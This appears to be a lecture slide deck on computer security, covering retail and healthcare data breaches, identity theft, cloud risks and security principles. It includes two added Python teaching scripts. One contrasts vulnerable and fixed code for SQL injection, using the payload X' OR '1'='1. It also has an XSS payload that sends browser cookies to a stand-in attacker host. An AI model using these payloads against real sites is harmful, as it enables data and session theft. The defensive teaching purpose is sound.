COMPUTER SECURITY: WHAT'S ALL THE FUSS ABOUT?
Barbara Hewitt, PhD

AGENDA
• The goal
• The issues
• Computer security
• Identity theft
• Healthcare identity theft
• Electronic health records (the first topics lead into why EHR is such a concern)

THE GOAL: CIA OF SECURITY
• Confidentiality, integrity, availability

THE PROBLEM IS EVOLVING
• Dumb terminals
• CRTs and 10 MB hard disks
• P2, P3
• Core i5, Core i7, 500 GB disks, 8 GB RAM
• Now it's in the cloud... who has it?

EVOLUTION OF HACKERS
• White hat hackers
• Black hat hackers
• Script kiddies
• Organized crime and other criminals
• State-sponsored hackers
• Spy hackers
• Cyber terrorists
• Hacktivists

RECAP 2012
• 27,485,000 lost/stolen/missing records
• 680 breaches reported (who knows how many are not reported)
• South Carolina: 6.4M identities stolen
• Germany: 3-month hack, 8.4M identities posted online
• California: 1M UDIDs stolen; 7 months to discover
• California tech companies (x2): 800K IDs stolen; 6–12 months to discover
• Florida college: 300K identities; 5 months
• Arizona: 42K PHI records; 6 months
• Ohio: 15K records; 18+ months

ADVERTISEMENT FOR STOLEN TARGET CARDS (image)

A TIMELINE OF THE TARGET DATA BREACH (image)

TARGET'S POSSIBLE MISSED OPPORTUNITIES (image)

TARGET CORPORATE RESPONSE
• Access point closed when it was discovered on December 15, 2013.
• No indication that Social Security numbers were taken.
• "We are committed to making this right and are investing in the internal processes and systems needed to reduce the likelihood that this ever happens again. For example, we are accelerating our plans to put chip-enabled technology in our stores and on our Target REDcards by early 2015, six months ahead of our previous plan."
TARGET'S RESPONSE: FEDERAL TESTIMONY
• Not aware of the breach until December 12th
• Incident ran from November 27th through December 15th
• "Target had in place multiple layers of protection, including firewalls, malware detection software, intrusion detection and prevention capabilities and data loss prevention tools." (VP and CFO testimony)
• Certified compliant with the Payment Card Industry Data Security Standard (PCI DSS) in 2013

TARGET'S RESPONSE: MEDIA AND CUSTOMER BACKLASH
• News of the breach broke from sources other than Target.
• "5 Lessons For Every Business from Target's Data Breach" (Forbes Online)
• "the company moved quite slowly on the breach" (TechCrunch)
• "Communication with customers from Target was inadequate and unclear" (WSJ)
• The lack of communication and the slow response opened the door to follow-on scams: criminals posing as Target spokespeople offered to "assist" affected customers.

FINANCIAL IMPACT
• 40 million: payment card records stolen over 19 days (Nov. 27 – Dec. 15)
• 70 million: customer records stolen
• 46 percent: drop in profit in the 4th quarter of 2013 compared with 2012
• $148 million: estimated cost of the breach to Target through the end of summer 2014 (offset by a $38 million insurance policy)
• $53.7 million: estimated amount the hackers earned from selling 2 million cards on the black market
• $55 million: estimated compensation the CEO will receive on his departure from Target
• $200 million: estimated cost to banks and credit unions for reissuing cards and handling related issues

THE IT IMPACT
• New hires
  – Chief risk and compliance officer: Jacqueline Hourigan Rice (reports directly to the CEO)
  – CISO: Brad Maiorino
• Security and technology enhancements
  – Enhanced monitoring and logging
  – Application whitelisting on POS systems
  – Enhanced network segmentation

IT IMPACT: BIGGEST INVESTMENT
• Chip-enabled card technology (MasterCard chip-and-PIN)
• $100 million
• Implemented in 2015 across 1,797 stores

HOW TARGET COULD HAVE REACTED DIFFERENTLY
• Not ignoring the warnings its own monitoring systems raised
• Segregating the POS systems from the rest of the network
• End-to-end encryption
• Inventory of systems, with whitelisting
• Detailed logging

SECURITY BREACHES
Company             | Duration                | Affected / information stolen
T.J. Maxx           | 2007, 18-month period   | 4.5–8.6 billion; estimated 45 million debit/credit card numbers
Home Depot          | April 2014 – Sept. 2014 | 56 million credit card numbers
Sally Beauty Supply | Feb. – March 2014       | 25,000 names, card numbers and CVV codes
Neiman Marcus       | July 2013 – Jan. 2014   | 1.2 million card numbers
Michaels Stores     | May 2013 – Jan. 2014    | 3 million card numbers
Dairy Queen         | Aug. 2014 – Sept. 2014  | TBD; card numbers, names and expiration dates
Kmart               | Sept. 2014 – Oct. 2014  | TBD; card numbers

SECURITY BREACH INFORMATION
• Identity Theft Resource Center, report dated 11/25/2014: 2014 data breach stats, total breaches 696, records exposed 81,443,910
  http://www.idtheftcenter.org/images/breach/DataBreachReports_2014.pdf
• Privacy Rights Clearinghouse (https://www.privacyrights.org/): 931,357,921 records breached in 4,449 data breaches made public since 2005

COST OF A SECURITY DATA BREACH
How do you calculate the cost of a data breach?
• Direct expenses
  – Forensic experts
  – Outsourced hotline support
  – Free credit monitoring subscriptions and discounts on future products and services
• Indirect costs
  – In-house investigations and communication
  – Extrapolated value of customer loss resulting from turnover or diminished customer acquisition rates
• According to the IBM/Ponemon research, the average total cost of a data breach for the participating companies increased 15 percent to $3.5 million, and the average cost per lost or stolen record containing sensitive and confidential information rose more than 9 percent, from $136 in the 2013 study to $145 in the 2014 study.

LESSONS LEARNED
http://www.businessweek.com/videos/2014-03-13/hacking-timeline-what-didtarget-know-and-when
• States enacting laws: Kentucky, Iowa, Florida, Minnesota, California and New Jersey
• These laws spell out what businesses must do if they discover a breach that has compromised customers' personal data.
• As of January of this year, the Senate has four data security proposals that many in the chamber believe could be combined into a single bill that would win approval and go to the House; the House has several cyber security bills and one breach notification bill.

EVOLUTION
• Same list for the last 3 years

COMPUTER EVOLUTION (image)

EVOLUTION (image)

THE SECURITY PROBLEM
• Security used to be physical
• From mainframes to PCs, smartphones, iPads, tablets and other personal devices
• Ubiquitous, everywhere internet
• Today, data is more expensive than computers

GEEK EVOLUTION (image)

SECURITY TRENDS (chart: sophistication of attacks versus the knowledge necessary to exploit vulnerabilities)

SECURITY TRENDS
• Organizations experiencing security incidents declined from 46 percent in 2007 to 43 percent in 2008
• Four types of attacks are on the rise
  – Unauthorized access
  – Theft/loss of proprietary information
  – Misuse of web applications
  – DNS attacks
• The average loss due to theft of proprietary information was $5.69 million in 2007.
• The average loss due to financial fraud was $21.12 million in 2007.

TRAFFIC ORIGINATION OF ATTACKS, Q4 2012 (chart)
• Russia disappeared from the list of top attack-origin countries in mid-2014; don't think this means they are not out there.

THE SECURITY PROBLEM: CYBER CRIMES
• The computer is the target: malware; denial of service
• The computer is used to perpetrate the act: identity theft; medical identity theft; cyberstalking; information warfare; phishing scams

SKIMMING
• The practice of reading a card's magnetic stripe into a hidden device
• A keypad overlay captures the PIN and/or CVV code
• Difficult to detect from a single transaction; compare trends across large numbers of transactions
• Use data mining to discover relationships among the compromised transactions and what they have in common, such as a merchant or location (a common point of purchase)

COUNTERMEASURES: CARD ISSUERS
• Fraud detection and prevention software using profiles (e.g., IP addresses)
• On detection: contact the cardholder; place the account on hold; block the card; investigate the activity
• Strong authentication
  – Multifactor: PIN, ZIP code, challenge questions, CVV
  – Out-of-band: text message, phone call or security token device
• Collaboration across the industry

COUNTERMEASURES: MERCHANTS
• PAN truncation (display only the last 4 digits of the number)
• Tokenization (data security): do not store the full number in the database
• Additional verification data: PIN, ZIP code or CVV

CHIP-AND-PIN (EMV) TECHNOLOGY
• EMV: Europay, MasterCard and Visa
• Widely used in Europe, Mexico, Brazil and Japan
• Embedded security chip and PIN
• Visa adoption in 4/13, but it will move to mobile-device near-field technology in the future
• MasterCard will follow
• Cost to switch in the US: $3B, or by other estimates $6 billion
• Two researchers have figured out how to skim the numbers
• Next move: toward dynamic authentication with unique card or transaction data that cannot be duplicated

BANK CHIP AND PIN
• FICO Falcon Fraud Manager Consortium reports a 60% drop in counterfeit fraud between 3/09 and 3/11
• The US accounts for 27% of credit card purchase volume, yet 47% of global credit card fraud occurs in the US

COST OF STOLEN DATA
• The Sony hack netted 2.2M credit card numbers according to the hackers
and 12.7K according to Sony
• Prices per stolen credit card number have dropped from $5–10 each to $1–2
• Target cards sold for $20–40 each in late 2013, with a refund if the card had been stopped

OTHER BREACHES
• Simply take pictures of the front and back of a card

WAYS TO FIND INFORMATION
• LinkedIn

IDENTITY THEFT
http://www.consumer.ftc.gov/features/feature-0014-identity-theft
• Data breaches cost $194 per record breached

REPAIR ID THEFT
• Immediately
  – Place an initial fraud alert
  – Order your credit reports
  – Create an identity theft report
• Monitor progress
  – Log all phone calls
  – Send all correspondence by certified mail with return receipt
  – Keep all original documents
  – List all important dates; send follow-ups when companies are delinquent

LONG TERM
• Extend fraud alerts and credit freezes; most attacks come 6 months after the card is stolen
• Repair your credit
• Sample letters at www.consumer.ftc.gov
• Your rights under federal law
  – Identity theft report
  – 90-day initial fraud alert, extendable to 7 years
  – Free copies of your credit report
  – Fraudulent information blocked
  – Dispute inaccurate and fraudulent information
  – Get copies of documents related to your case
  – Stop debt collectors from harassing you

COMMON CAUSES (chart)

SECURING ELECTRONIC HEALTH RECORDS
Clinton (1999): "As more of our medical records are stored electronically, the threat to all of our privacy increases."

HEALTHCARE
• 230,000 physicians
• 8,700 hospitals
• 35M Americans

HIPAA, HITECH, AMERICAN RECOVERY AND REINVESTMENT ACT
• Mandate protection
• Safeguard information

HEALTHCARE MEDICAL IDENTITY THEFT
• 1.5M people in the US in 2011
• 1.85M people in 2012
• $41.3B in 2012
• $12B in 2012
• $233 per lost healthcare record
• 94% of hospitals have had data breaches
• 52% of organizations experienced medical identity theft

COST OF MEDICAL DATA BREACHES (chart)

MEDICAL IDENTITY THEFT: DETECTION
• Check medical and insurance statements regularly
• A bill for medical services you didn't receive
• A call
from a debt collector about a medical debt you don't owe
• Medical collection notices on your credit report that you don't recognize
• A notice from your health plan saying you reached your benefit limit
• Denial of insurance because your medical records show a condition you don't have

SOME EXAMPLES
• Anthem
• Sutter Health

ANTHEM
• Second- or third-largest health insurer
• Network partner of Blue Cross Blue Shield
• 78.8 million records in total: customers and others
• 8.8 to 18.8 million were not direct customers
• Anyone who used its services over the past 10 years

ANTHEM: WHAT WAS TAKEN
• Names
• Dates of birth
• Member ID / Social Security numbers
• Addresses, phone numbers, email addresses
• Employment information such as income data

ANTHEM: WHO DID IT?
• Chinese government?
• "Very sophisticated external cyber attack"
• Too early to really tell

ANTHEM: WHAT ARE THE RESULTS?
• Children's records are affected: SSN stolen, no prior credit history, might not know for years
• Insurance numbers used for treatment
• Victim saddled with bills and inaccurate health care records
• Contacted to pay for services not received
• Reduction in allowable benefits for services used
• Incorrect medical diagnoses in the record

WHAT CAN I DO?
• Choose strong passwords
• Change passwords often
• Be aware of what you store and share electronically
• Never email confidential information
• Delete old bank account information and credit card numbers
• Never store a master list of passwords
• Consider using protection
  – Software updates
  – Two-factor authentication
  – Secured, encrypted connections (HTTPS)
  – A throwaway email address
  – Don't download files from unknown sources
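The SKIMMING and COUNTERMEASURES: MERCHANTS slides earlier describe two techniques without showing them: finding the merchant that a set of compromised cards has in common (common point of purchase analysis), and keeping the full card number out of the merchant's database through PAN truncation and tokenization. The script below is an added example written for this page; it is not code from the deck or from any card brand or processor. Every PAN, merchant, transaction and fraud report in it is constructed, and the token format, the Luhn helper and the function names are this example's own.

```python
"""Merchant-side PAN handling (Luhn check, truncation, tokenization) and
issuer-side common point of purchase (CPP) analysis. Added example; every
PAN, merchant and fraud report below is constructed for illustration."""
import re
import secrets
from collections import defaultdict
from datetime import date


def luhn_valid(pan: str) -> bool:
    """Luhn check-digit test. From the rightmost digit, double every second
    digit (subtracting 9 if the result exceeds 9) and sum; valid if the sum
    is a multiple of 10. Rejects anything that is not 13-19 digits."""
    digits = re.sub(r"[ -]", "", pan)
    if not re.fullmatch(r"\d{13,19}", digits):
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def truncate_pan(pan: str) -> str:
    """Display form: only the last four digits survive, the rest are masked."""
    digits = re.sub(r"\D", "", pan)
    return "*" * (len(digits) - 4) + digits[-4:]


class TokenVault:
    """The merchant's database keeps only the token; the PAN lives in this
    vault (in practice a separate, locked-down service). Tokens are random,
    so they cannot be reversed without the vault, and they carry the last
    four digits so receipts and customer service still work."""

    def __init__(self):
        self._pan_by_token = {}
        self._token_by_pan = {}

    def tokenize(self, pan: str) -> str:
        digits = re.sub(r"\D", "", pan)
        if not luhn_valid(digits):
            raise ValueError("not a valid PAN")
        if digits in self._token_by_pan:          # same card, same token
            return self._token_by_pan[digits]
        while True:
            token = f"tok_{secrets.token_hex(8)}_{digits[-4:]}"
            if token not in self._pan_by_token:   # guard against collision
                break
        self._pan_by_token[token] = digits
        self._token_by_pan[digits] = token
        return token

    def detokenize(self, token: str) -> str:
        return self._pan_by_token[token]


def common_point_of_purchase(transactions, fraud_reports, min_cards=2):
    """transactions: iterable of (card, merchant, date); f raud_reports: dict
    card -> date the cardholder reported fraud. For each merchant, count the
    distinct cards that were used there BEFORE their fraud report (a visit
    after the report cannot have caused it) against all distinct cards it
    saw. Returns (merchant, compromised, total, share) sorted by share."""
    seen = defaultdict(set)
    hit = defaultdict(set)
    for card, merchant, when in transactions:
        seen[merchant].add(card)
        reported = fraud_reports.get(card)
        if reported is not None and when < reported:
            hit[merchant].add(card)
    ranked = []
    for merchant, cards in seen.items():
        n_hit = len(hit[merchant])
        if n_hit >= min_cards:
            ranked.append((merchant, n_hit, len(cards), n_hit / len(cards)))
    ranked.sort(key=lambda r: (r[3], r[1]), reverse=True)
    return ranked


# Constructed sample: six cards (already tokenized), three merchants. The
# skimmer is at GasMart-17; card t6 visited it only after reporting fraud.
SAMPLE_TRANSACTIONS = [
    ("t1", "Grocer", date(2014, 3, 1)), ("t1", "GasMart-17", date(2014, 3, 3)),
    ("t2", "GasMart-17", date(2014, 3, 4)), ("t2", "Cafe", date(2014, 3, 5)),
    ("t3", "GasMart-17", date(2014, 3, 6)), ("t3", "Grocer", date(2014, 3, 7)),
    ("t4", "Grocer", date(2014, 3, 8)),
    ("t5", "Cafe", date(2014, 3, 9)), ("t5", "Grocer", date(2014, 3, 10)),
    ("t6", "GasMart-17", date(2014, 3, 30)),
]
SAMPLE_FRAUD_REPORTS = {"t1": date(2014, 3, 20), "t2": date(2014, 3, 21),
                        "t3": date(2014, 3, 22), "t6": date(2014, 3, 15)}


if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111 1111 1111 1111"                   # well-known test PAN
    tok = vault.tokenize(pan)
    print(truncate_pan(pan), tok, vault.detokenize(tok) == "4111111111111111")
    for m, n_hit, n_all, share in common_point_of_purchase(SAMPLE_TRANSACTIONS,
                                                           SAMPLE_FRAUD_REPORTS):
        print(f"{m:<12} compromised {n_hit} of {n_all} cards ({share:.0%})")
```

Two points the slides gloss over are visible here: the ranking only credits a merchant with visits that happened before the fraud was reported, otherwise every busy merchant the victim shopped at afterwards looks guilty, and the token is random rather than an encryption of the PAN, so a dump of the merchant database yields nothing that can be turned back into card numbers without the vault.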
THE PROPOSED MODEL (diagram)
• Constructs shown: security knowledge (virus awareness, malware awareness, firewall awareness, encryption awareness, security of the cloud); environment (number of employees, size of practice, costs, compliance issues); adoption of security when implementing EHR systems; secure EHR adoption; secure EHR-in-cloud adoption

ALTERNATIVE MODEL (diagram)
• Constructs shown: EHR features (authentication, ease of use, encryption, security of the cloud); security knowledge (firewall, malware/virus, authentication); environment (costs, compliance issues); EHR system adoption considerations; secure EHR considerations

CLOUD
• Type of cloud
  – Public: IT services including software, development and infrastructure delivered via the internet
  – Private: a virtualized data center that sits behind the organization's firewall and delivers IT as a service to internal users
  – Hybrid

TYPES OF CLOUDS (diagram)

CLOUD INFRASTRUCTURES
• Servers are virtualized
• Shared across multiple lines of business, and among multiple businesses
• Multiple cloud centers linked together, e.g., a public cloud in Singapore and a private cloud in the UK
• Security tools are far-flung
• IT loses a degree of control, and visibility into workloads and data
• Not sure about compliance

BENEFITS OF THE CLOUD
• Reduced costs: pay incrementally; save money; make budgeting easier and more predictable
• Safer data: physical protection against fire, flood, data theft and other concerns
• Anywhere/anytime: 24/7 data access; choose what level of access to give employees, customers, etc.
• Increased storage capacity: grows and shrinks with the business; easily upgradable
• Worry-free maintenance: upgrades to hardware, software and security are handled automatically by professional data center staff

CLOUD SECURITY
• Physical security: redundant power supplies, redundant internet connections, redundant hardware, fire and flood protection, theft protection
• Application security: firewalls, antivirus, data encryption software (between the firm and the data center)
• Administrative controls: govern access to data; limit access to certain functions; protect client files

MANAGING THE RELATIONSHIP
• The cloud provider may need access to your data; have policies in place about data access
• Right to refuse access
• Data logs should record who has accessed your data and when
• Read the privacy statement in the agreement and contract
• Ensure that your provider will not use your data for marketing or promotional activities (opt-in or opt-out option)
• It is your data: you are responsible for the data and your clients' privacy

WHAT IT PROFESSIONALS ARE MOST WORRIED ABOUT
• Private cloud: lack of control; lack of visibility into abstracted resources
• Public cloud: no way to measure security; lack of control (general); compliance; hypervisor vulnerabilities (shared space on a single hardware device); hackers' access to the data

CLOUD: REASONS TO USE
• Decrease capital investment
• Decrease operating costs
• Increase flexibility
• Scalable

ABUSE AND NEFARIOUS USE OF CLOUD COMPUTING
• Examples of things hosted on IaaS sites: the Zeus botnet; infostealer Trojan horses; downloads for Microsoft Office and Adobe PDF exploits
• Bots run from cloud-hosted sites

TOOLS ARE EASY TO USE (image)

BYOD
• Create the policy first
• Ensure all devices follow the policy before procuring technology
• KISS: make enrollment simple
• Ensure the end user can configure the device; self-service portals make the user responsible
• Personally identifiable data on personal devices must be
respected
• Keep corporate and personal data separate
• Monitor and manage the system
• Manage data usage
• ROI

WIRELESS
• Don't use public Wi-Fi except to pick a restaurant, and without releasing your other data
• Starbucks FREE WiFi is not free
• Jeremy, CTO of WhiteHat Security
• BBQ: Lockhart, Snow's, Kreuz

CLOUD SERVICE MODELS
• Infrastructure as a service (IaaS): operating system images and all application software
• Platform as a service (PaaS): OS, programming language execution environment, database and web server
• Software as a service (SaaS): the provider installs and operates the application software
• Storage as a service (STaaS): scalable, economical
• Security as a service (SECaaS): the provider integrates security services with the client's systems on a subscription basis: virus/malware/spyware support, intrusion detection, security event management, etc.
• Data as a service (DaaS): data provided on demand regardless of the geographic or organizational separation between provider and consumer; an outgrowth of service-oriented architecture
• Database as a service (DBaaS): provides a database server
• Test environment as a service (TEaaS): on-demand test environment, all in one, often using thin clients
• Desktop virtualization: separates the desktop environment from the hardware; the virtual desktop can be stored on a centralized server, allowing thin clients and smart devices
• API as a service (APIaaS): create and host application programming interfaces
• Backend as a service (BaaS): links web and mobile app developers' apps on mobile devices with back-end cloud storage

CLOUD TIERS
Tier 1
• Single, non-redundant distribution path serving the IT equipment
• Non-redundant capacity components
• Expected availability of 99.671%
Tier 2
• Meets or exceeds all Tier 1 requirements
• Redundant site infrastructure capacity components
• Expected availability of 99.741%
Tier 3
• Meets or exceeds all Tier 1 and Tier 2 requirements
• Multiple independent
distribution paths serving the IT equipment
• All IT equipment must be dual-powered and fully compatible with the topology of the site's architecture
• Concurrently maintainable site infrastructure, with expected availability of 99.982%
Tier 4
• Meets or exceeds all Tier 1, Tier 2 and Tier 3 requirements
• All cooling equipment is independently dual-powered, including chillers and heating, ventilating and air-conditioning (HVAC) systems
• Fault-tolerant site infrastructure with electrical power storage and distribution facilities, with expected availability of 99.995%

CLOUD (recap)
• Database as a service (DBaaS)
• Test environment as a service (TEaaS)
• Desktop virtualization
• API as a service (APIaaS)
• Backend as a service (BaaS)

CLOUD ARCHITECTURE (diagram)

CLIENT'S ROLE
• The biggest risk to data is within the firm: mis-routed data, other simple mistakes, outright theft by employees
• Centralized control offers better protection
• Easier to establish and enforce policies
• Removes issues related to onsite storage: a patchwork of email accounts, physical media, thumb drives
• Must still establish and implement policies

ACCESS MANAGEMENT
• Administrative modules allow the firm's system administrator to grant user access and to restrict who can access which data and functions
• Usage policies
  – Where can employees access data from? Public locations where others might be able to view it?
  – Can data be exported to insecure media or be distributed?
  – Can client data be emailed or transferred via insecure methods?
• While the cloud provider can help with good policies, the organization must communicate these policies and enforce them

STUDY
• IT professionals from Germany, the UK, the United States and China
• Organizations of 100–499, 500–999 and 1000+ employees

KEY CONFIDENCE BOOSTERS FOR PUBLIC CLOUD USE
• Set and enforce security policies across clouds: a common way to manage and ensure consistency of security across both private and public platforms
•
Create data boundaries: give IT more control over where certain workloads can run
• http://www.intel.com/content/www/us/en/cloud-computing/whatsholding-back-the-cloud-peer-research-report.html

OPEN TO NETWORK-TYPE ATTACKS: DISTRIBUTED DENIAL OF SERVICE
• The attacker hijacks servers and uses them to flood the target until its web services stop functioning
• SYN cookies and limiting the number of connections a single user may hold to a server all help stop a DDoS attack

OPEN TO NETWORK-TYPE ATTACKS: MAN IN THE MIDDLE
• When Secure Sockets Layer (SSL) is incorrectly configured, client and server authentication may not behave as expected, leading to man-in-the-middle attacks [3]

OPEN TO NETWORK-TYPE ATTACKS: NETWORK SNIFFING
• A packet sniffer captures sensitive data sent unencrypted, such as passwords and web-service configuration files: UDDI (Universal Description, Discovery and Integration), SOAP (Simple Object Access Protocol) and WSDL (Web Services Description Language)
• Port scanning: port 80 is always open because the web server sits on it; as long as traffic is encrypted and the server software is configured correctly, an open web port by itself should not lead to an intrusion

OPEN TO NETWORK-TYPE ATTACKS: SQL INJECTION
• Special characters or terms in input make the database return unintended data
• A string that ends up in the WHERE clause of an SQL statement can be tricked into including more information
• A value of X' or 1=1 may cause a whole table to be returned, since 1=1 is always true

OPEN TO NETWORK-TYPE ATTACKS: CROSS-SITE SCRIPTING
• Inserting code into a field or URL that gets executed in visiting browsers hands control or sensitive data to the attacker
• Leads to DoS attacks, spyware and malicious code pushed into visiting browsers, and violation of user privacy

OPEN TO NETWORK-TYPE ATTACKS: LOSS OF GOVERNANCE
• The customer cedes control to the cloud provider (CP) on a number of issues which may affect security
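The SQL injection and cross-site scripting slides above describe the attacks in one sentence each. The script below, an added example for this page and not code from the deck, puts the vulnerable form of each next to its hardened form so the difference can be run and observed. The SQLite table, its rows and the two payloads are constructed; the function names are this example's own.

```python
"""SQL injection and cross-site scripting: the vulnerable form beside the
hardened form. Added example; the SQLite table and its rows are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("alice", "111-22-3333"),
                      ("bob", "444-55-6666"),
                      ("carol", "777-88-9999")])
    return conn


def lookup_vulnerable(conn, username):
    """The input is pasted into the SQL text. A username of
        X' OR '1'='1
    closes the quoted string and appends a condition that is always true,
    so the WHERE clause matches every row and the whole table comes back.
    (The slide's  X' or 1=1  form works the same way once the attacker also
    neutralises the trailing quote, e.g. with a -- comment.)"""
    sql = f"SELECT username, ssn FROM accounts WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Bound parameter: the value travels separately from the statement, so
    quotes inside it are data, never syntax. The same payload matches no row."""
    return conn.execute(
        "SELECT username, ssn FROM accounts WHERE username = ?",
        (username,)).fetchall()


def render_greeting_vulnerable(name):
    """Reflects the field straight into the page: a <script> in the name
    runs in every visitor's browser with that site's cookies."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_escaped(name):
    """html.escape turns < > & \" ' into entities, so the browser displays
    the payload as text instead of executing it."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


SQLI_PAYLOAD = "X' OR '1'='1"
XSS_PAYLOAD = ("<script>new Image().src='http://attacker.invalid/?c='"
               "+document.cookie</script>")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", lookup_vulnerable(db, SQLI_PAYLOAD))
    print("parameterized:", lookup_parameterized(db, SQLI_PAYLOAD))
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_escaped(XSS_PAYLOAD))
```

The fix in both cases is the same idea: keep data and code apart. Parameterized queries hand the value to the driver instead of splicing it into the statement, and output encoding turns the attacker's markup into inert text before the browser ever sees it; escaping on input alone is not enough, because the same stored value may later be rendered in a context with different rules.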
OPEN TO NETWORK-TYPE ATTACKS: LOSS OF GOVERNANCE (continued)
• SLAs may not offer a commitment on the part of the cloud provider to provide such services, leaving a gap in security defenses

OPEN TO NETWORK-TYPE ATTACKS: LOCK-IN
• Currently little on offer in the way of tools, procedures, standard data formats or service interfaces that could guarantee data, application and service portability
• Hard for a customer to migrate from one provider to another, or to migrate data and services back to an in-house IT environment
• Dependency on a particular CP for service provision, especially if data portability, the most fundamental aspect, is not enabled

OPEN TO NETWORK-TYPE ATTACKS: DATA PROTECTION
• Cloud computing poses several data protection risks for cloud customers and providers
• It is difficult for the cloud customer (in its role as data controller) to effectively check the data handling practices of the cloud provider, and so to ensure that the data is handled in a lawful way
• Exacerbated in cases of multiple transfers of data, e.g., between federated clouds
• Cloud providers should provide information on their data handling practices.
• Some also offer certification summaries on their data processing and data security activities and the data controls they have in place, e.g., SAS 70 certification

OPEN TO NETWORK-TYPE ATTACKS: INSECURE OR INCOMPLETE DATA DELETION
• Is data truly wiped when a request to delete a cloud resource is made? As with most operating systems, deletion may not result in true wiping of the data
• Adequate or timely data deletion may be impossible (or not wanted by the customer) because extra copies of the data are stored but not available, or because the disk to be destroyed also stores data from other clients
• With multiple tenancies and the reuse of hardware resources, this is a higher risk to the customer than with dedicated hardware

OPEN TO NETWORK-TYPE ATTACKS: OTHER WEAKNESSES
• Lack of physical authentication such as biometrics and swipe cards
• Misconfiguration may contribute to the loss of data or allow a hacker to gain entry
• Unpatched operating system software
• Use of untrusted software and tools within the cloud

TOP 5 CLOUD SECURITY ISSUES
• Every breached security system was once thought infallible
• Understand the risks of cloud computing
• How cloud hosting companies have approached security
• Local law and jurisdiction where data is held
• Best practice for companies in the cloud

THE SECURITY PROBLEM: CYBER CRIMES
• Fraud
  – Alter computer input (integrity)
  – Alter, destroy, suppress or steal output
  – Alter or delete stored files/data
  – Alter or misuse system tools or software packages
  – Bank fraud
  – Identity theft
  – Extortion
  – Theft of classified information
• Cracking
• Copyright infringement
• Child pornography
• Child grooming
• Espionage
• Spam (a crime in some jurisdictions)
• Obscene or offensive content
• Harassment: cyber bullying, stalking, hate crime, online predators
• Threats
• Drug trafficking
• Cyber terrorism
• Cyber warfare
• Electronic health records

MALWARE
• Malware: malicious software
• Viruses: serve no useful purpose
• Worms: reproduce themselves
• Trojan horses: hidden inside other software
• Remedies: antivirus software and system patching
• Seldom used in highly structured attacks

SAMPLE OF SECURITY INCIDENTS
• The Morris Worm (November 1988)
• Citibank and Vladimir Levin (June–October 1994)
• Kevin Mitnick (February 1995)
• Omega Engineering and Timothy Lloyd (July 1996)
• Worcester Airport and "Jester" (March 1997)
• U.S. electric power grid (1997–2009)
• Solar Sunrise (February 1998)
• The Melissa virus (March 1999)
• I Love You virus (May 2000)
• The Code Red worm (2001)
• Adil Yahya Zakaria Shakour (August 2001–May 2002)
• The Slammer worm (2003)
• TJ Maxx (2004–2006)
• Conficker (2008–2009)
• Fiber cable cut (2009)
• Stuxnet (discovered 2010)

THREATS TO SECURITY
• From unstructured threats to highly structured threats
• Internal vs. external
• Elite hackers vs. script kiddies

STRUCTURED VS. UNSTRUCTURED
• Structured: long period of time; large number of individuals; financial backing; seek the help of insiders
• Unstructured: short periods of time (lasting at most a few months); small number of individuals; little to no financial backing; insiders or outsiders who do not seek collusion with other insiders

INSIDER VS. EXTERNAL ATTACKS
• Insiders: disgruntled employees; accidents (not an attack at all)
• External: organized crime; terrorists and information warfare; hacktivists

INSIDERS
• Malicious: logic bombs, embezzlement, data theft
• Innocent: data leakage, social engineering, weak passwords

HACKERS
• Originally, a person who had a deep understanding of computers and networks and explored how things worked in their separate parts (or "hacked" them).
• The media redefined the term as a person who attempts to gain unauthorized access to computer systems or networks, deliberately accessing them without authorization

ORGANIZED CRIME
• Financial transactions over the Internet have increased
• Fraud, extortion, theft, embezzlement and forgery
• A structured threat

TERRORISTS AND INFORMATION WARFARE
• Nations depend upon computers, which makes them targets of unfriendly foreign powers
• Information warfare is warfare conducted against the information and information processing equipment used by an adversary
• A highly structured threat
• Can be directed against national infrastructure

CRITICAL INFRASTRUCTURES
• During warfare, an adversary may choose targets other than the opposing army
• Critical infrastructures are those whose loss or impairment would have severe repercussions on society
• Water, electricity, oil and gas refineries, banking and telecommunications

HACKTIVISTS
• Attack to make a statement or prove a point
• Target organizations the hacktivist (group) disagrees with
• Political reasons

AVENUES OF ATTACK
• Specifically targeted: an organization or nation; the attacker does not know the equipment or software in advance; time consuming
• Target of opportunity: identify a vulnerability in exploitable software, then locate a system with that vulnerability

SECURITY PRINCIPLES
• Least privilege
• Separation of duties
• Implicit deny
• Job rotation
• Layered security
• Defense in depth
• Security through obscurity
• Keep it simple

SECURITY APPROACHES
• Ignore security issues: run "out of the box"
• Host security: each computer is "locked down" individually; maintaining an equal and high level of security amongst all computers is difficult and usually ends in failure
• Network security: controlling access to internal computers from external entities

LEAST PRIVILEGE
• A subject (user, application or process) should have only the rights and privileges necessary to perform its task, with no additional permissions.
• By limiting a subject's privilege, we limit the amount of harm it can cause.
• For example, a person should not be logged in as an administrator; they should be logged in with a regular user account and change context to do administrative duties.

SEPARATION OF DUTIES
• More than one individual is required to complete a sensitive task
• Applicable to physical environments as well as network and host security
• No single individual can abuse the system
• Potential drawback is the cost: time (tasks take longer) and money (must pay two people instead of one)

IMPLICIT DENY
• If a particular situation is not covered by any of the rules, then access is not granted
• Any individual without proper authorization cannot be granted access
• The alternative to implicit deny is to allow access unless a specific rule forbids it

JOB ROTATION
• Rotating individuals through different tasks and duties in the organization's IT department
• Individuals gain a better perspective of how the various parts of the IT department can help or hinder the organization
• Prevents a single point of failure where only one employee knows mission-critical job tasks

LAYERED SECURITY
• Secure a system with multiple levels: different access controls, various tools and devices
• Compromising the system becomes a challenge: it takes longer and may cost more than it is worth
• Potential downside: time and money to implement

DIVERSITY OF DEFENSE
• Complements the layered security approach
• Use dissimilar/different layers of security
• Benefit: an attacker who compromises one layer must still get through the next, which uses a different system of security

SECURITY THROUGH OBSCURITY
• Relies on the environment and protection mechanisms being confusing or supposedly not generally known
• Hide an object
• It's not effective.
